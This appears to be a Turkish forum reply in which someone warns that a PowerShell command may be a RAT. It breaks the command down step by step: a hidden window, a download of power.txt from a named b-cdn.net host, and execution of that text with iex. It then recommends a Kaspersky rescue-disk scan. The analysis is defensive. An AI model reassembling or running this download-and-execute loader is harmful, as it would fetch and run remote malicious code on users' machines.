Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.
Detaylar ;
-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.
$url = '
https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (
https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.
$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.
$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.
iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.
Yapmanız gerekenler;
Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.
